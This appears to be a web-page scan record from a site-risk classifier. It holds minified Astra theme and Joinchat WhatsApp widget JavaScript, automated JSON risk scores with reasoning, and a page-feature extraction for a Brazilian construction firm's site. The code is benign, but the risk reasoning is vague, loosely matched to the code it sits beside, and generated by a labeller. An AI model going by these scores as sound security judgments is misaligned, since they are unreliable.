d=Object.entries(o).map(((e,t)=>[`--e-global-color-${i[t].replace(/-/g,"")}: ${e[1]};`,`${n}${t}: ${e[1]};`])).map((e=>e.join(""))).join("");let c=document.getElementById("starter-templates-preview-palette-css");c||(c=document.createElement("style"),c.id="starter-templates-preview-palette-css",c.setAttribute("rel","stylesheet"),document.head.appendChild(c)),c.innerHTML=`.starter-templates-preview-palette{ ${d} }`;break;case"siteTypography":if(!Object.keys(e.value.data).length){const e=document.getElementById("starter-templates-typography");return void(e&&e.remove())}(e=>{if(!e)return;if(!document.getElementById("google-fonts-domain")){const e=document.createElement("link");e.id="google-fonts-domain",e.setAttribute("rel","preconnect"),e.setAttribute("href","https://fonts.gstatic.com"),document.head.appendChild(e)}let t=document.getElementById("st-previw-google-fonts-url");t||(t=document.createElement("link"),t.id="st-previw-google-fonts-url",t.setAttribute("rel","stylesheet"),document.head.appendChild(t));const a=[];let o=e["body-font-family"]||"",n=parseInt(e["body-font-weight"])||"";n&&(n=`:wght@${n}`),o&&(o=l(o),o=o.replace(" ","+"),a.push(`family=${o}${n}`));let r=e["headings-font-family"]||"",s=parseInt(e["headings-font-weight"])||"";s&&(s=`:wght@${s}`),r&&(r=l(r,o),r=r.replace(" ","+"),a.push(`family=${r}${s}`));const i=`https://fonts.googleapis.com/css2?${a.join("&")}&display=swap`;t.setAttribute("href",i)})(e.value.data),(e=>{if(!e)return;let t=document.getElementById("starter-templates-typography");t||(t=document.createElement("style"),t.id="starter-templates-typography",t.setAttribute("rel","stylesheet"),document.head.appendChild(t));let a="";a+="body, button, input, select, textarea, .ast-button, .ast-custom-button {",a+="\tfont-family: "+e["body-font-family"]+";",a+="\tfont-weight: "+e["body-font-weight"]+";",a+="\tfont-size: "+e["font-size-body"].desktop+e["font-size-body"]["desktop-unit"]+";",

{
    "risk_score": 5,
    "reasoning": "The provided JavaScript snippet exhibits a mix of behaviors that require further review. While it appears to have some legitimate functionality related to a chat/messaging feature, it also exhibits several moderate-risk indicators that warrant closer inspection. The script interacts with external domains, performs aggressive DOM manipulation, and uses legacy APIs. Additionally, the presence of obfuscated code and the ability to trigger the chat feature from various entry points (e.g., URL parameters, click events) raise some concerns. Overall, this script requires more analysis to determine the full extent of its behavior and potential risks."
}

!function(f,m,v,b){"use strict";function t(){f(v).trigger("joinchat:starting");var t,e,n=1e3*b.settings.button_delay,i=1e3*b.settings.message_delay,s=!!b.settings.message_hash,o=!!b.$(".joinchat__box").length,a=parseInt(b.store.getItem("joinchat_views")||1)>=b.settings.message_views,h=(b.store.getItem("joinchat_hashes")||"").split(",").filter(Boolean),c=void 0!==b.settings.is_viewed?b.settings.is_viewed:-1!==h.indexOf(b.settings.message_hash||"none");function r(){clearTimeout(e),b.chatbox_show()}function _(){b.save_hash(),b.chatbox_hide()}var l,g,d=!c&&(b.settings.message_badge||!s||!i||!a);function u(){var t=(v.activeElement.type||"").toLowerCase();0<=["date","datetime","email","month","number","password","search","tel","text","textarea","time","url","week"].indexOf(t)?b.chatbox?(b.chatbox_hide(),setTimeout(function(){b.hide()},400)):b.hide():b.show()}setTimeout(function(){b.show(d)},n),s&&i&&!c&&(b.settings.message_badge?e=setTimeout(function(){b.$(".joinchat__badge").addClass("joinchat__badge--in")},n+i):a&&(e=setTimeout(r,n+i))),o&&!b.is_mobile&&b.$(".joinchat__button").on("mouseenter",function(){t=setTimeout(r,1500)}).on("mouseleave",function(){clearTimeout(t)}),b.$(".joinchat__button").on("click",function(){o&&!b.chatbox?r():Date.now()>b.showed_at+600&&(_(),b.open_whatsapp())}),b.$(".joinchat__close").on("click",_),b.$("#joinchat_optin").on("change",function(){b.$div.toggleClass("joinchat--optout",!this.checked)}),b.$(".joinchat__box__scroll").on("mousewheel DOMMouseScroll",function(t){t.preventDefault();t=t.originalEvent.wheelDelta||-t.originalEvent.detail;this.scrollTop+=30*(t<0?1:-1)}),b.is_mobile&&(f(v).on("focus blur","input, textarea",function(t){f(t.target).closest(b.$div).length||(clearTimeout(l),l=setTimeout(u,200))}),f(m).on("resize",function(){clearTimeout(g),g=setTimeout(function(){b.$div[0].style.setProperty("--vh",m.innerHeight+"px")},200)}).trigger("resize"));var p,h=new URL(m.location);"#joinchat"==h.hash&&(b.show(),setTimeout(r,700)),h.searchParams.has("joinchat")&&(s=1e3*(parseInt(h.searchParams.get("joinchat"))||0),setTimeout(function(){b.show()},s),setTimeout(r,700+s)),f(v).on("click",'.joinchat_open, .joinchat_app, a[href="#joinchat"], a[href="#whatsapp"]',function(t){t.preventDefault(),!o||b.optin()&&!f(this).is('.joinchat_open, a[href="#joinchat"]')?b.open_whatsapp(f(this).data("phone"),f(this).data("message")):r()}),f(v).on("click",".joinchat_close",function(t){t.preventDefault(),b.chatbox_hide()}),o&&"IntersectionObserver"in m&&0<(a=f(".joinchat_show, .joinchat_force_show")).length&&(p=new IntersectionObserver(function(t){f.each(t,function(){if(0<this.intersectionRatio&&(!c||f(this.target).hasClass("joinchat_force_show")))return r(),p.disconnect(),!1})}),a.each(function(){p.observe(this)})),b.use_qr()?b.$(".joinchat__qr").append(b.qr(b.whatsapp_link(void 0,void 0,!1))):b.$(".joinchat__qr").remove(),o&&b.$div.css("--peak","url(#joinchat__peak_"+(b.$div.closest("[dir=rtl]").length?"r":"l")+")"),f(v).trigger("joinchat:start"),b.is_ready=!0}b=f.extend({$div:null,settings:null,store:null,chatbox:!1,showed_at:0,is_ready:!1,is_mobile:!!navigator.userAgent.match(/Android|iPhone|BlackBerry|IEMobile|Opera Mini/i),can_qr:m.QrCreator&&"function"==typeof QrCreator.render},b),(m.joinchat_obj=b).$=function(t){return f(t||this.$div,this.$div)},b.send_event=function(n){var t,e,i,s;(n=f.extend({event_category:"JoinChat",event_label:"",event_action:"",chat_channel:"whatsapp",chat_id:"--",is_mobile:this.is_mobile?"yes":"no",page_location:location.href,page_title:v.title||"no title"},n)).event_label=n.event_label||n.link||"",n.event_action=n.event_action||n.chat_channel+": "+n.chat_id,delete n.link,!1!==f(v).triggerHandler("joinchat:event",[n])&&(s=m[this.settings.ga_tracker]||m.ga||m.__gaTracker,t=m[this.settings.data_layer]||m[m.gtm4wp_datalayer_name]||m.dataLayer,"function"==typeof s&&"function"==typeof s.getAll&&(s("set","transport","beacon"),s.getAll().forEach(function(t){t.send("event",n.event_category,n.event_acti

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a part of the Astra WordPress theme and contains utility functions for DOM manipulation, event handling, and smooth scrolling. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is focused on providing common theme-related functionality and does not exhibit any high-risk indicators. The script seems to be primarily for legitimate purposes, such as handling navigation menus and scroll-to-top functionality, with no clear signs of malicious intent."
}

var astraGetParents=function(e,t){Element.prototype.matches||(Element.prototype.matches=Element.prototype.matchesSelector||Element.prototype.mozMatchesSelector||Element.prototype.msMatchesSelector||Element.prototype.oMatchesSelector||Element.prototype.webkitMatchesSelector||function(e){for(var t=(this.document||this.ownerDocument).querySelectorAll(e),a=t.length;0<=--a&&t.item(a)!==this;);return-1<a});for(var a=[];e&&e!==document;e=e.parentNode)(!t||e.matches(t))&&a.push(e);return a},getParents=function(e,t){console.warn("getParents() function has been deprecated since version 2.5.0 or above of Astra Theme and will be removed in the future. Use astraGetParents() instead."),astraGetParents(e,t)},astraToggleClass=function(e,t){e.classList.contains(t)?e.classList.remove(t):e.classList.add(t)},toggleClass=function(e,t){console.warn("toggleClass() function has been deprecated since version 2.5.0 or above of Astra Theme and will be removed in the future. Use astraToggleClass() instead."),astraToggleClass(e,t)},astraTriggerEvent=(!function(){function e(e,t){t=t||{bubbles:!1,cancelable:!1,detail:void 0};var a=document.createEvent("CustomEvent");return a.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),a}"function"!=typeof window.CustomEvent&&(e.prototype=window.Event.prototype,window.CustomEvent=e)}(),function(e,t){var a=new CustomEvent(t,2<arguments.length&&void 0!==arguments[2]?arguments[2]:{});e.dispatchEvent(a)});astraSmoothScroll=function(e,t){e.preventDefault(),window.scrollTo({top:t,left:0,behavior:"smooth"})},astScrollToTopHandler=function(e,t){var a=getComputedStyle(t).content,n=t.dataset.onDevices,a=a.replace(/[^0-9]/g,"");"both"==n||"desktop"==n&&"769"==a||"mobile"==n&&""==a?(n=window.pageYOffset||document.body.scrollTop,e&&e.length?n>e.offsetHeight+100?t.style.display="block":t.style.display="none":300<window.pageYOffset?t.style.display="block":t.style.display="none"):t.style.display="none"},function(){var l=document.querySelectorAll("#masthead .main-header-menu-toggle"),c=document.getElementById("masthead"),i={},d="",u=document.body,m="";function e(e){d=e.detail.type;var t=document.querySelectorAll(".menu-toggle");if("dropdown"===d&&(document.getElementById("ast-mobile-popup").classList.remove("active","show"),g("updateHeader")),"off-canvas"===d)for(var a=0;a<t.length;a++)void 0!==t[a]&&t[a].classList.contains("toggled")&&t[a].click();n(d)}function g(e){m=c.querySelector("#ast-mobile-header");var t="";if(null==m||"dropdown"!==m.dataset.type||"updateHeader"===e){t=(void 0!==e&&"updateHeader"!==e?e.closest(".ast-mobile-popup-inner"):document.querySelector("#ast-mobile-popup")).querySelectorAll(".menu-item-has-children");for(var a=0;a<t.length;a++){t[a].classList.remove("ast-submenu-expanded");for(var n=t[a].querySelectorAll(".sub-menu"),s=0;s<n.length;s++)n[s].style.display="none"}var o=document.querySelectorAll(".menu-toggle");document.body.classList.remove("ast-main-header-nav-open","ast-popup-nav-open"),document.documentElement.classList.remove("ast-off-canvas-active");for(var l=0;l<o.length;l++)o[l].classList.remove("toggled"),o[l].style.display="flex"}}function n(e){var t=document.querySelectorAll("#ast-mobile-header .menu-toggle"),a=document.querySelectorAll("#ast-desktop-header .menu-toggle");if(void 0===e&&null!==c)if(m=c.querySelector("#ast-mobile-header"))e=m.dataset.type;else{var n=c.querySelector("#ast-desktop-header");if(!n)return;e=n.dataset.toggleType}if("off-canvas"===e){var n=document.getElementById("menu-toggle-close"),s=document.querySelector(".ast-mobile-popup-inner");if(null==s)return;popupLinks=s.getElementsByTagName("a");for(var o=0;o<t.length;o++)t[o].removeEventListener("click",astraNavMenuToggle,!1),t[o].addEventListener("click",popupTriggerClick,!1),t[o].trigger_type="mobile";for(o=0;o<a.length;o++)a[o].removeEventListener("click",astraNavMenuToggle,!1),a[o].addEventListener("click",popupTriggerClick,!1),a[o].trigger_type="desktop";n.addEventListener("click",function(e){document.getElementById("ast-m

{
  "contains_trigger_text": true,
  "trigger_text": "Construindo certo, seus sonhos.",
  "prominent_button_name": "Fale agora por WhatsApp",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Certo Construtora"
  ]
}